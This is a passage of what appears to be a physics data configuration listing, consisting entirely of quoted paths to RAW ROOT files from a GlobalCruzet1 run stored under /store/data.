'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5094F75E-C41C-DD11-B213-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/50F25166-C81C-DD11-85F3-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5226D48D-CA1C-DD11-A560-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/529811ED-BB1C-DD11-B009-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5410534C-C41C-DD11-B43A-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54770146-C41C-DD11-9790-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/549CC491-CC1C-DD11-8EB2-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/54EC00E7-BD1C-DD11-86E8-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5613B8D3-D21C-DD11-A49D-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/564941D8-D21C-DD11-B75D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/580242EB-BD1C-DD11-B34E-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5807F882-CA1C-DD11-B19D-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5819A263-C41C-DD11-B93A-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5856C70C-BE1C-DD11-90DF-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFC591-CC1C-DD11-9D51-001617C3B6C6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58BFCDE8-BD1C-DD11-924A-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/58C248C6-D01C-DD11-B059-0019DB29C620.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A00E33C-C61C-DD11-B95A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5A22A0B4-CE1C-DD11-A7BD-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5AB6A96D-C81C-DD11-9224-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5ABCF4EA-BD1C-DD11-BEC4-001617C3B6E8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C00E13C-C61C-DD11-BC62-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C029908-BE1C-DD11-8D92-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5C8FF55E-C41C-DD11-A1B7-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EC8D0EF-BD1C-DD11-AF64-001617C3B5E4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EDD9A34-C21C-DD11-83C7-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/5EE95EF0-BD1C-DD11-8A21-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/625095C3-D01C-DD11-9A3D-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62BB3764-C81C-DD11-BBD3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62D3B406-BE1C-DD11-A3C3-000423D94AA8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/62E3211E-C01C-DD11-93FE-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/666DBCE5-BB1C-DD11-8798-000423D94AA8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/66F8A946-C41C-DD11-92FC-000423D98DB4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/68773EEE-BB1C-DD11-BABD-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A2E651E-C01C-DD11-84C1-000423D94990.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A44B7C8-D01C-DD11-8F4F-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6A6DB7F0-BB1C-DD11-9956-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6CCACD33-C21C-DD11-A4E2-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/6E894A32-C21C-DD11-AD3B-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/703CC249-C41C-DD11-B7EE-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7042ABF9-BB1C-DD11-99CB-000423D996B4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/70929317-C01C-DD11-8762-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/72014426-C21C-DD11-AC2E-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7442701B-C21C-DD11-B0D4-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/74E7AFF1-BB1C-DD11-BDEE-000423D944FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/760CE253-C41C-DD11-9431-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/763379F4-BF1C-DD11-B9FF-000423D6C8E6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7647D092-CA1C-DD11-922E-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/766816D6-BB1C-DD11-BC35-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/769F4256-C41C-DD11-858D-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76AEBDBF-D01C-DD11-A47D-000423D6CA72.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/76C8B52A-C21C-DD11-BF56-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B3F914-C01C-DD11-B45B-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78B871C3-D01C-DD11-AE14-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/78D879C3-D01C-DD11-AB54-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7AA262D0-B91C-DD11-9AE8-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C5A8EDE-BB1C-DD11-8883-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7C91A4D1-D01C-DD11-9C38-001617E30D00.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CA38092-CC1C-DD11-B3CD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CBF8F21-C21C-DD11-AE6F-001617DBD472.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CCAEC8D-CA1C-DD11-ACE0-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CD95E12-C01C-DD11-946F-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7CF8CCB7-CE1C-DD11-BBC5-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/7E88CB00-BE1C-DD11-A4F2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/807685B9-CE1C-DD11-BDE9-001617DBD316.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/821564AD-CE1C-DD11-935B-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/827CD5E5-BD1C-DD11-8A9D-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/82E4352D-C21C-DD11-A609-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8408B7F0-BB1C-DD11-8737-000423D98930.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8434B0D0-BB1C-DD11-B3FF-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B26D4E-C41C-DD11-A476-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86B564D5-BB1C-DD11-8DAC-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/86BB41EB-BD1C-DD11-AC05-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88C52BD1-B91C-DD11-9018-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/88E8E765-C81C-DD11-B9F5-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8A50CFD5-BB1C-DD11-A5AC-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8ADC3A47-C61C-DD11-8B91-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C313DA9-CE1C-DD11-886B-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5B3009-C01C-DD11-9CBD-001617C3B77C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8C5EEA19-C01C-DD11-87DB-000423D98AF0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CDE12B8-CE1C-DD11-B016-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8CF25D88-CC1C-DD11-87AC-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8E7CCBC9-B91C-DD11-9DC7-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EAAD7EF-BD1C-DD11-87A9-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/8EB94A9D-CA1C-DD11-BD37-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9002413D-C61C-DD11-8F13-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/904500F6-BF1C-DD11-A72B-000423D6B358.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90650142-C61C-DD11-9D29-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/906666A6-CE1C-DD11-8150-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90C564AD-CE1C-DD11-8CB2-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/90D4F325-C21C-DD11-8AE2-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/927D4BCC-B91C-DD11-901B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9436CC91-CC1C-DD11-AAD9-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/94DF6FBE-D01C-DD11-AF80-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9623B3D8-D21C-DD11-87DF-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96C5EF49-C41C-DD11-924D-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/96FA9F95-CA1C-DD11-B4F2-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9897F7DF-BB1C-DD11-9A1B-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A03A402-C01C-DD11-8445-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3AAC06-BE1C-DD11-ABCE-001617C3B654.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9A3F7F01-BE1C-DD11-9163-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9AECBFAD-CE1C-DD11-8024-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CD29BC2-B91C-DD11-AA74-001617C3B65A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9CE491F4-BB1C-DD11-99D6-000423D98750.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E0AB00E-C01C-DD11-B975-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9E3A7467-C81C-DD11-8ED6-001617C3B5D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EEA60D4-B91C-DD11-A2CC-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/9EF3B958-C41C-DD11-B6DA-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A039DFF6-BD1C-DD11-B92E-001617DBD224.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A054B619-C21C-DD11-B913-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A0E92059-C41C-DD11-A68C-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2287EA3-CC1C-DD11-9191-001617C3B5F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A22A0AA2-CC1C-DD11-B64A-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A24F3E0A-C01C-DD11-9FBB-001617C3B6C6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A298BAC8-B91C-DD11-B235-000423DD2F34.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A2C47E4E-C61C-DD11-9003-001617C3B6CE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4412EE2-BD1C-DD11-91AD-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A441E958-C81C-DD11-87EF-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A45B800F-C01C-DD11-A4C3-001617E30F58.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4743792-CC1C-DD11-8FF3-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4956AC1-D01C-DD11-831E-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A4C86A24-C21C-DD11-A311-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A600E0DA-BB1C-DD11-A3FA-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A6C9CEAB-CE1C-DD11-9068-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A83BF12B-C21C-DD11-BA3F-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85100F9-BB1C-DD11-8610-000423D9989E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A85B574E-C41C-DD11-9727-001617DBD332.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A89BB268-C81C-DD11-B973-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/A8B4ACF4-BF1C-DD11-B38C-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA0830DB-D21C-DD11-8065-000423D6CA42.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AA22C202-BE1C-DD11-9FB5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AAC9C441-C61C-DD11-8BD3-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/ACA9E015-C21C-DD11-BA35-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE02DC53-C41C-DD11-8FE6-001617C3B6DE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE0D0D54-C41C-DD11-9BB8-001617C3B6CE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE240861-C81C-DD11-80B8-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE6999EC-BB1C-DD11-8866-000423D98E6C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE7136CC-B91C-DD11-9831-000423D98950.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE86A9B9-D01C-DD11-A29D-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/AE8F9A49-C41C-DD11-8B66-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B009918A-CA1C-DD11-982D-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B016F7FB-BD1C-DD11-B8B6-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B01F2516-C21C-DD11-8FC3-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02481F5-BD1C-DD11-8A72-001617E30D4A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B02B64D6-BB1C-DD11-A3CE-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B051A8FB-BD1C-DD11-B7AB-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0683BFC-BD1C-DD11-B043-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B09FBB45-C21C-DD11-B2EE-001617E30D12.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B0A93C4F-C41C-DD11-8736-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B2B62AB9-D01C-DD11-B55B-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B41E2C53-C61C-DD11-A94F-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B438131A-C21C-DD11-B626-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4517446-C61C-DD11-ACBC-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4779F8A-CC1C-DD11-BFB1-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B4CF580D-C01C-DD11-8B5D-001617E30CC8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B612C72A-C21C-DD11-BD75-001617C3B5E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B67DD69E-CE1C-DD11-8F69-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B6897EC8-B91C-DD11-BD5F-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B80F3696-CA1C-DD11-BD90-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81950D8-D21C-DD11-B36F-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B81B443A-C61C-DD11-A800-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B83C61F5-BD1C-DD11-B5FD-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/B8599355-C81C-DD11-A68F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA002BE5-BB1C-DD11-A279-001617DBD5B2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA48FBA7-CC1C-DD11-BA37-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BA68A5D2-B91C-DD11-8939-000423D98B5C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAB7A2F5-BD1C-DD11-8CE7-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BAFBE4CF-D01C-DD11-AD5D-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC03A04C-C61C-DD11-B6C6-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BC58B4B7-CE1C-DD11-B473-0016177CA7A0.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE3C2165-C41C-DD11-BCB1-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BE708B20-C01C-DD11-9862-000423D98BC4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEA65F0C-C01C-DD11-983A-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/BEB2F75E-C41C-DD11-A2D1-001617C3B706.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C015805E-C81C-DD11-AF4A-001617E30CE8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C02B2DE2-BD1C-DD11-A5FD-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2053F88-CA1C-DD11-890F-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C26F6CB5-CE1C-DD11-A748-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2A2F3D3-D21C-DD11-B7BE-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2BFF2E5-BD1C-DD11-93D1-001617E30D40.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C2DC70C3-CC1C-DD11-8234-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C45BCFEF-BB1C-DD11-AF09-000423D99996.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C46CC141-C61C-DD11-9FDA-001617E30D52.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C4E9EB89-CC1C-DD11-AEC2-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C645C5B9-CE1C-DD11-BFD0-001617C3B78C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C65D8692-CC1C-DD11-B7B5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C697C4F1-BD1C-DD11-8550-001617C3B66C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6DB2D95-CC1C-DD11-8C3F-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6E0A522-C21C-DD11-9C24-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6ED43E7-BB1C-DD11-8A18-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C80D9AEC-BB1C-DD11-8974-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8335398-CC1C-DD11-A2D4-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8E8C504-C01C-DD11-85C6-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA2218B6-D01C-DD11-979F-000423D6B42C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA368935-C21C-DD11-9788-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA3844EB-BD1C-DD11-913E-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA65A6FA-BF1C-DD11-8CC1-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CAB471E2-BD1C-DD11-9D4E-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC12A30D-C01C-DD11-8A10-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC8E9A1F-C21C-DD11-ADF9-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE497BC3-D01C-DD11-928A-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE6685CE-D01C-DD11-BE9B-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D01B6C02-BE1C-DD11-897C-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D06A2FCC-B91C-DD11-A9DA-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D221ABE5-BB1C-DD11-9DB3-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D28A8F02-C01C-DD11-9866-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D2B2FDB2-CE1C-DD11-8F56-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D47C0DE8-BD1C-DD11-9B8C-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D6D574D2-BB1C-DD11-981F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8776455-C81C-DD11-8D7F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8B0FBB8-D01C-DD11-A27F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8FF2B18-C01C-DD11-9B55-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DA4A4889-CC1C-DD11-8A16-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAD4298E-CA1C-DD11-A10E-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAEE505E-C81C-DD11-980A-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC13C55E-C81C-DD11-BAC1-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC1B6554-C61C-DD11-BF49-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC4E4EA8-CE1C-DD11-8FC3-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC709BFC-BF1C-DD11-A6B7-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE27427E-CA1C-DD11-935C-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE504FEB-BD1C-DD11-B7B8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E06A7CF4-BB1C-DD11-9694-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E08DE8FC-BF1C-DD11-8C8E-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0A9CA00-BE1C-DD11-9C4E-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0DE281D-BE1C-DD11-8AA4-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E28F4E88-CA1C-DD11-AD78-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2AC1367-C81C-DD11-9EA9-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2D03EA8-CE1C-DD11-BEBD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E41BC293-CC1C-DD11-8E24-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E438B3FA-BB1C-DD11-87A6-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E43E694A-C41C-DD11-B161-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E445BB2A-C21C-DD11-BFE6-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E451BF1C-C01C-DD11-8AB4-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E60810B4-CE1C-DD11-812E-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8AFD30A-C01C-DD11-85A6-001617C3B778.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8CECFF9-BF1C-DD11-B9C7-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAC5E41D-C01C-DD11-8BE1-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAF03AE7-BB1C-DD11-848C-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE214960-C81C-DD11-A182-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE4E914E-C41C-DD11-A095-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE5A5200-BE1C-DD11-81C8-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EEAFA849-C41C-DD11-8203-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F0C47660-C81C-DD11-9107-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2075E91-CA1C-DD11-B1C4-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F207EC43-C61C-DD11-A230-001617E30F58.root',
